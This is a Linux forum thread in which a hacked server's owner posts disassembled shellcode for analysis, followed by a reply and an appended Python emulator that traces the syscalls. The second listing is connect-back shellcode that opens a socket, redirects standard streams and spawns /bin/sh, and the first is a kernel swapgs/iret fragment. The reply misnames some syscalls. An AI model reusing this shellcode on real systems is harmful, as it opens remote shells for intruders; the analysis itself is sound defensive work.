Old 11-04-2013, 11:21 AM   #1
jumalinuxguy
LQ Newbie
 
Registered: Nov 2013
Posts: 1

Rep: Reputation: Disabled
assembly code and security gurus. my Linux box was hacked!


Hello friends,

I run a personal web server that recently suffered an unfortunate break-in / hacking attempt. The server that was broken into is running CentOS 6.3 (old, yes, I know).

I have already taken the server offline to limit further damage and penetration of my home network.

Recently, while attempting to do a post-mortem analysis of the attacks which were used, I found some shell code.

Please forgive me, I am ignorant of most technical code (also my English is still very bad). My work friend helped me to decrypt these shell codes. He says they are assembly, but I know very little about assembly language programming, so I come here to ask you if these programs look bad to you.

Can some assembly guru here please tell me what these codes were used to do to my webserver? I am pretty sure they broke into the root account, and I have unplugged this machine so no more damage can be done.

But still I would like to know HOW they did it, and what the assembly programs exploited, so that I can better protect my server in the future.

Thank you all very much!!

Assembly codes below.
Code:
program 1:
------SNIP--------
.data:0x00000000	0f01f8	swapgs
.data:0x00000003	e805000000	call   func_0000000d
.data:0x00000008	0f01f8	swapgs
.data:0x0000000b	48	dec    eax
.data:0x0000000c	cf	iret
------SNIP--------

program 2:
------SNIP--------
.data:0x00000000	31c0	xor    eax,eax
.data:0x00000002	31db	xor    ebx,ebx
.data:0x00000004	31c9	xor    ecx,ecx
.data:0x00000006	31d2	xor    edx,edx
.data:0x00000008	b066	mov    al,0x66
.data:0x0000000a	b301	mov    bl,0x1
.data:0x0000000c	51	push   ecx
.data:0x0000000d	6a06	push   0x6
; char* dst = arg[0]
.data:0x0000000f	6a01	push   0x1
.data:0x00000011	6a02	push   0x2
.data:0x00000013	89e1	mov    ecx,esp
.data:0x00000015	cd80	int    0x80
.data:0x00000017	89c6	mov    esi,eax
.data:0x00000019	b066	mov    al,0x66
.data:0x0000001b	31db	xor    ebx,ebx
; while (c != 0)
.data:0x0000001d	b302	mov    bl,0x2
.data:0x0000001f	6866686653	push   0x53666866
.data:0x00000024	fec3	inc    bl
.data:0x00000026	89e1	mov    ecx,esp
.data:0x00000028	6a10	push   0x10
.data:0x0000002a	51	push   ecx
.data:0x0000002b	56	push   esi
.data:0x0000002c	89e1	mov    ecx,esp
.data:0x0000002e	cd80	int    0x80
.data:0x00000030	31c9	xor    ecx,ecx
.data:0x00000032	b103	mov    cl,0x3
.data:0x00000034		loc_00000034:
┏▶	.data:0x00000034	fec9	dec    cl
┃ 	.data:0x00000036	b03f	mov    al,0x3f
┃ 	.data:0x00000038	cd80	int    0x80
┗ 	.data:0x0000003a	75f8	jne    loc_00000034
.data:0x0000003c	31c0	xor    eax,eax
.data:0x0000003e	52	push   edx
.data:0x0000003f	686e2f7368	push   0x68732f6e
.data:0x00000044	682f2f6269	push   0x69622f2f
.data:0x00000049	89e3	mov    ebx,esp
.data:0x0000004b	52	push   edx
.data:0x0000004c	53	push   ebx
.data:0x0000004d	89e1	mov    ecx,esp
.data:0x0000004f	52	push   edx
.data:0x00000050	89e2	mov    edx,esp
.data:0x00000052	b00b	mov    al,0xb
.data:0x00000054	cd80	int    0x80
------SNIP--------

Thank you all, and well wishes!

Last edited by unSpawn; 11-04-2013 at 01:33 PM. Reason: //add vBB code tags
 
Old 11-05-2013, 05:24 AM   #2
kbp
Senior Member
 
Registered: Aug 2009
Posts: 3,790

Rep: Reputation: 653
I'm not a guru, but it looks like the code tries to spawn a new process. If I'm reading correctly, there are 2 calls to setsid(), then a call to dup2(), followed by a call to execve(). I'm not sure what process it wants, but there are a few strange pushes (all printable ASCII chars), so it may be attempting to build the file name on the stack.

As far as determining which service it exploited, I can't tell. It may be possible to run the binary/shellcode through VirusTotal and get a hit, which may lead you to more information about what the exploit targets.
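An added analysis aid, not code from this thread: the Python below replays program 2's instructions (mnemonics transcribed from the listing above) on a tiny register and stack model and lists the syscalls it would make, so the socket/connect/dup2/execve sequence and the "//bin/sh" string that the pushes build on the stack become visible directly. The stack address and the file descriptor that socket() returns are assumptions.

```python
import struct
# i386 Linux syscall numbers the listing uses (eax at int 0x80), the socketcall
# sub-calls ebx selects, and the 8-bit aliases the code writes (low byte of a reg).
SYSCALLS = {0x66: "socketcall", 0x3f: "dup2", 0x0b: "execve"}
SUBCALLS = {1: "socket", 2: "bind", 3: "connect"}
LOW = {"al": "eax", "bl": "ebx", "cl": "ecx"}
# Program 2 from the post, mnemonics only, instructions separated by ';'.
PROGRAM2 = """xor eax,eax; xor ebx,ebx; xor ecx,ecx; xor edx,edx; mov al,0x66; mov bl,0x1;
push ecx; push 0x6; push 0x1; push 0x2; mov ecx,esp; int 0x80; mov esi,eax; mov al,0x66;
xor ebx,ebx; mov bl,0x2; push 0x53666866; inc bl; mov ecx,esp; push 0x10; push ecx;
push esi; mov ecx,esp; int 0x80; xor ecx,ecx; mov cl,0x3; loc_34:; dec cl; mov al,0x3f;
int 0x80; jne loc_34; xor eax,eax; push edx; push 0x68732f6e; push 0x69622f2f;
mov ebx,esp; push edx; push ebx; mov ecx,esp; push edx; mov edx,esp; mov al,0xb; int 0x80"""
def trace(asm, fd=3):
    """Replay the shellcode on a tiny register/stack model; fd is the assumed socket() result."""
    regs = dict(eax=0, ebx=0, ecx=0, edx=0, esi=0, esp=0x1000)  # esp is a made-up stack top
    mem, zf, calls, pc = {}, False, [], 0
    code = [i.strip() for i in asm.split(";") if i.strip()]
    labels = {i[:-1]: n for n, i in enumerate(code) if i.endswith(":")}
    val = lambda t: regs[t] if t in regs else int(t, 0)   # register name or immediate
    word = lambda addr: mem.get(addr, 0)                   # 32-bit load, untouched memory is 0
    def cstr(addr):  # NUL-terminated string, read one 32-bit little-endian word at a time
        buf = b""
        while b"\0" not in buf: buf += struct.pack("<I", word(addr + len(buf)))
        return buf.split(b"\0", 1)[0].decode()
    while pc < len(code):
        op, _, rest = code[pc].partition(" ")
        a, pc = rest.split(","), pc + 1
        if op == "xor":                    # only the xor r,r zeroing idiom occurs
            regs[a[0]] = 0
        elif op == "mov":                  # an 8-bit mov leaves the upper 24 bits alone
            r = LOW.get(a[0], a[0])
            regs[r] = (regs[r] & ~0xff | val(a[1])) if a[0] in LOW else val(a[1])
        elif op == "push":
            regs["esp"] -= 4; mem[regs["esp"]] = val(a[0])
        elif op in ("inc", "dec"):         # sets ZF, which the jne tests
            r = LOW[a[0]]; regs[r] += 1 if op == "inc" else -1; zf = (regs[r] & 0xff) == 0
        elif op == "jne" and not zf:
            pc = labels[a[0]]
        elif op == "int":
            name = SYSCALLS[regs["eax"]]
            args = [regs["ebx"], regs["ecx"]]  # dup2 gets the 3 left in ebx, not the fd in esi
            if name == "socketcall":       # ebx = sub-call, ecx -> its argument array
                name, args = SUBCALLS[regs["ebx"]], [word(regs["ecx"] + 4 * n) for n in range(3)]
                if name == "connect": args[1] = "sockaddr(family=%#x)" % (word(args[1]) & 0xffff)
                regs["eax"] = fd if name == "socket" else 0
            elif name == "execve":         # ebx -> path, ecx -> argv, edx -> envp
                args = [cstr(regs["ebx"]), "argv[0]=" + cstr(word(regs["ecx"]))]
            calls.append("%s(%s)" % (name, ", ".join(map(str, args))))
    return calls
```

AF_INET is 2, so the family of 0x6866 that the trace reports means the listing as posted does not contain a well-formed sockaddr_in; comparing it against the original captured bytes would be the next step.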